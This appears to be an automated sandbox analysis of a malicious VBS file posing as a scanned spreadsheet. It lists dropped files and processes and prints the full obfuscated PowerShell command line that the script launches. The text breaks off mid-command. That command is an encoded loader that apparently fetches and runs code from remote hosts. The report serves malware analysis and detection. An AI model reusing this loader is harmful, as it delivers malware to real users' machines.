Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SKMBT_77122012816310TD0128_17311_XLS.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\1210\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1
|
Unicode text, UTF-16, little-endian text, with very long lines (32656)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
|
ASCII text, with very long lines (339), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odjsreb.3ee.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30muupxy.oof.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_355wyowr.4mh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pcgnwal.lvb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0eo2lqc.ea3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eey4aeiy.epi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5wbr03l.bzg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbf1cixn.r34.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1snccbb.02v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myjq1qrj.ckp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onctug1l.lnb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opy1veih.brh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwmwqtex.1du.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyh0zagw.m52.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjtezlof.q34.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1fvvhl3.z1m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpefziyl.pxn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2cdge2y.spg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkygwrx3.tlf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwtczm4x.b0s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF59e29e.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF59ff5e.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZB6AP7T5JPLHVE0MPFL.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EQE4R152POI5BP6PSOXQ.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EYVYE2PL7JSJ5UM1S0CP.temp
|
data
|
dropped
|
There are 22 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ'
+ [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' +
[char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65
+ 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65
+ 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 +
'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65
+ 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65
+ 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65
+ 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65
+ '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65
+ 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65
+ 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0'
+ [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65
+ '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65
+ 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 +
'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K'
+ [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 +
'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65
+ 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8'
+ [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 +
'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65
+ 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65
+ 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65
+ 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65
+ 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65
+ 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65
+ 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65
+ 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh'
+ [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4'
+ [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65
+ 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 +
'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65
+ 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65
+ 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65
+ 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65
+ 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65
+ 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65
+ 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' +
[char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba'
+ [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0'
+ [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 +
'7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65
+ 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 +
'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 +
'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65
+ '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65
+ 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65
+ 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65
+ '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65
+ 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65
+ 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' +
[char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU'
+ [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ'
+ [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65
+ 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65
+ 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' +
[char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' +
[char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 +
'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk'
+ [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU'
+ [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65
+ 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 +
'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4'
+ [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ'
+ [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI'
+ [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65
+ 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65
+ 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65
+ 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65
+ 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65
+ 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65
+ 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' +
[char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + ''
+ [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI'
+ [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' +
[char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65
+ 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65
+ 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65
+ '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65
+ 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 +
'' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 +
's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 +
'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1'
+ [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' +
[char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65
+ 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65
+ 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65
+ 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' +
[char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 +
'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65
+ 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65
+ 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65
+ 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65
+ 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65
+ 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65
+ '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' +
[char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65
+ 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65
+ 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' +
[char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65
+ 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65
+ 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65
+ 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65
+ 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65
+ 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65
+ 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65
+ 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65
+ 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65
+ 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65
+ 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65
+ 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65
+ 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65
+ 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65
+ 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' +
[char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u'
+ [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65
+ 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65
+ '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + ''
+ [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65
+ 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65
+ 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD'
+ [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65
+ 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65
+ 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' +
[char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 +
'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65
+ 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65
+ '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65
+ 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65
+ 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65
+ 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 +
'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 +
'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65
+ '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65
+ 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65
+ 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65
+ 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65
+ 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65
+ '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65
+ 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65
+ 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65
+ 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' +
[char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 +
'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C'
+ [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ'
+ [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65
